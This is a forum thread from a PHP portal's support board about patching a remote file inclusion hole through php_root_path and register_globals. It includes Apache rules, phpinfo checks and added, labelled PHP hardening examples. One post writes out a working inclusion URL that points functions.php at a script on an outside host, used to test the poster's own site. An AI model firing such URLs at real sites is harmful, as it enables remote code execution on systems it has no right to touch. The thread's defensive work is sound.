"Vadar";p="14537" wrote:OK, I'm the ultimate novice on php, but I'm having the same problem that Twitchy described in the ACP under the Photo Album section. I went back in and verified that I had all of the latest fixes as per the second post installed (Rev 5).
While doing that I noticed something that looked strange to me. For the fix labeled function_portal.php 1 fix Rev 05 I notice that it shows: die("Hacking attempt");
For the other fixes, Hacking attempt is in single quotes vice double quotes, like this:
die('Hacking attempt');
Is that right?
For Michaelo, here is what I get when I hover my cursor over the ACP - Photo Album - CLowN SP Config link: http://www.navyjrotc.us/portal/admin/ad ... 149ade22d2
"Michaelo";p="14539" wrote:One of us is confused...
Before you can upload a file you either need ftp access or as a member you upload a file of allowed types (.gif, .png etc.).
There is no other way for a hacker to put a file on a server, assuming they haven't hacked another site on the server, in which case they may be able to cross contaminate…
agreed. To hack a site first you need a way in; to accomplish this you need to find a vulnerable point and exploit it, as with the recent hacks. The hackers used a remote file/script via the php_root_path weakness to execute a remote script allowing them access… Once they gained access they proceeded to either upload files to gain control of the site or, as in most cases, simply used a remote script hack tool to do this…
I have examined the possibility of restricting upload directories to only accept certain files such as images or zips in an effort to counter the cross contamination problem… more later on this…

```apache
# The <Directory> path and the two <FilesMatch> patterns were lost when the post
# was extracted; the values below are placeholders, not the ones originally posted.
<Directory "/PATH/TO/HOSTING/ROOT">
    # Allow access to the root of the hosting folder
    Options None
    AllowOverride None
    Order allow,deny
    Allow from all

    # But only to files with the specified extensions: deny everything first...
    <FilesMatch "DENIED_PATTERN">
        Order allow,deny
        Deny from all
    </FilesMatch>

    # ...then re-allow only the extensions that should be served
    <FilesMatch "ALLOWED_PATTERN">
        Order allow,deny
        Allow from all
    </FilesMatch>
</Directory>
```
"Michaelo";p="14544" wrote:computerz, you as admin determine what can be uploaded; it's in the ACP, "allow upload file type" or something like that.
That's good to know.
you cannot send any type of command via the address...
will most certainly! Play around with this little htaccess info and see how it goes...

```apache
# The <Directory> path and the two <FilesMatch> patterns were lost when the post
# was extracted; the values below are placeholders, not the ones originally posted.
<Directory "/PATH/TO/HOSTING/ROOT">
    # Allow access to the root of the hosting folder
    Options None
    AllowOverride None
    Order allow,deny
    Allow from all

    # But only to files with the specified extensions: deny everything first...
    <FilesMatch "DENIED_PATTERN">
        Order allow,deny
        Deny from all
    </FilesMatch>

    # ...then re-allow only the extensions that should be served
    <FilesMatch "ALLOWED_PATTERN">
        Order allow,deny
        Allow from all
    </FilesMatch>
</Directory>
```
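The Apache rules above only control what the web server will serve back; the ACP "allowed file types" setting Michaelo mentions has to be enforced when the file arrives. The following is an added example (not the portal's code and not from any post in this thread) of what that upload check looks like in PHP: an extension allow-list, a content sniff so that a script renamed to .gif is refused, and a server-chosen filename so the uploader never picks what lands on disk. The allow-list, the directory path and the function names are assumptions made for the example.

```php
<?php
// Added example, not the portal's own upload code.
// Constructed allow-list: extension => MIME type the file content must really have.
const ALLOWED_UPLOAD_TYPES = [
    'gif'  => 'image/gif',
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'zip'  => 'application/zip',
];

/**
 * Returns the extension the file may be stored under, or null to reject it.
 * $clientName is the filename sent by the browser (untrusted);
 * $tmpPath is the temporary file PHP wrote for the upload.
 */
function acceptedUploadExtension(string $clientName, string $tmpPath): ?string
{
    // Only the last extension counts, and the file is later renamed anyway,
    // so "shell.php.gif" is judged purely as a gif.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_UPLOAD_TYPES[$ext])) {
        return null;
    }

    // Sniff the real content; $_FILES[...]['type'] is client-supplied and ignored.
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($tmpPath);
    if ($detected !== ALLOWED_UPLOAD_TYPES[$ext]) {
        return null;
    }

    // Second, independent check for images: it must parse as one.
    if (str_starts_with($detected, 'image/') && @getimagesize($tmpPath) === false) {
        return null;
    }
    return $ext;
}

/**
 * Moves an accepted upload into $uploadDir under a random name.
 * Returns the stored path, or null when the upload was rejected.
 */
function storeUpload(array $file, string $uploadDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = acceptedUploadExtension($file['name'], $file['tmp_name']);
    if ($ext === null) {
        return null;
    }
    // Server-chosen filename: nothing from the request reaches the filesystem path.
    $target = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    chmod($target, 0644); // readable, never executable
    return $target;
}

// Usage inside an upload handler (directory path is an assumption):
// $stored = storeUpload($_FILES['userfile'] ?? [], '/var/www/portal/album/upload');
// if ($stored === null) { die('Upload rejected'); }
```

The upload directory should additionally carry the Deny/Allow rules from the post so that even a file that slips through is served as static content rather than handed to the PHP engine.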
"ihammo";p="14568" wrote:Now I am confused
I applied all the fixes as per Rev 5 and thought I would try the exploit on my site to see if it worked.
So, i popped http://my site/portal/includes/functions.php?php_root_path=http://www.testing123.com/test.html in to a browser and I did not get a "hacking attempt" message.
Has anyone else tried this on their own site to see what happens? Until I can fix this I have taken my site offline completely.

```php
<?php phpinfo(); ?>
```
"ihammo";p="14588" wrote:When Register_Globals was OFF I got the exact same response as you Soloman.
I added some extra code to the hacking code to display the root path that was being used and no matter what I did whilst Register_Globals was OFF I couldn't pass anything to functions.php via the URL.
However, when Register_Globals was ON, I would get the "hacking attempt. Details Logged" message when testing the URL.
I take it you do have direct control over the Register_Globals variable on your server and did check that it was ON or OFF? I created a simple php file with the code

```php
<?php phpinfo(); ?>
```

which I then navigated to in my browser to check that the Register_Variable had indeed changed. I run apache under windows on my test server and had to restart apache after changing the php.ini file (which needs to be in your windows directory I think - or apache does not seem to see it [but that could be my crappy set up of apache]).

```apache
php_value register_globals 0
```
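The thread's observation, that the URL only has an effect while register_globals is ON, follows from how that setting works: every query-string parameter becomes a PHP global before the script runs, so a file that does `include($php_root_path . '...')` without first setting `$php_root_path` itself will include whatever the request named. The following is an added example, not the portal's code and not the Rev 5 fix itself: the vulnerable pattern as the posts describe it, next to a guard of the kind the "Hacking attempt" fix applies, plus a check that reports whether register_globals is still on. The function names, the `includes/template.php` path and the directory layout are assumptions.

```php
<?php
// Added example, not the portal's own code.

/**
 * Vulnerable pattern as described in the thread: with register_globals=On,
 * ?php_root_path=http://... has already become the global $php_root_path, so
 * this path points at a remote script and include() would fetch it (when
 * allow_url_fopen/allow_url_include permit URLs).
 */
function vulnerableIncludePath(): string
{
    global $php_root_path;   // possibly populated from the query string
    return $php_root_path . 'includes/template.php';
}

/**
 * Hardened pattern: refuse any request that tries to supply the path from
 * outside (the caller answers with die('Hacking attempt'), as in the fix),
 * and derive the path from this file's own location, never from request data.
 * Returns the trusted path, or null when the request must be rejected.
 */
function trustedIncludePath(array $get, array $post, array $cookie): ?string
{
    foreach ([$get, $post, $cookie] as $source) {
        if (array_key_exists('php_root_path', $source)) {
            return null;
        }
    }
    // Assumption: this file lives in <root>/includes/, so the root is one level up.
    $root = realpath(__DIR__ . '/..');
    if ($root === false) {
        return null;
    }
    return $root . '/includes/template.php';
}

/**
 * True when register_globals is still enabled, whichever spelling php.ini used.
 * On PHP 5.4 and later the setting no longer exists and this returns false.
 */
function registerGlobalsIsOn(): bool
{
    $value = strtolower(trim((string) ini_get('register_globals')));
    return in_array($value, ['1', 'on', 'yes', 'true'], true);
}

// Runtime checks: warn about the setting, then apply the guard before any include.
if (registerGlobalsIsOn()) {
    error_log('register_globals is ON; set "php_value register_globals 0" in .htaccess or php.ini');
}

$templatePath = trustedIncludePath($_GET, $_POST, $_COOKIE);
if ($templatePath === null) {
    die('Hacking attempt');
}
// require_once $templatePath;   // the actual include would follow here
```

Single and double quotes around 'Hacking attempt' behave identically in PHP for a string with no variables or escape sequences, so the mix of quoting styles between the Rev 5 fixes does not change what `die()` prints. Turning register_globals off, as the post's `php_value` line does, removes the channel entirely; the guard is the defence for installations where that setting cannot be changed.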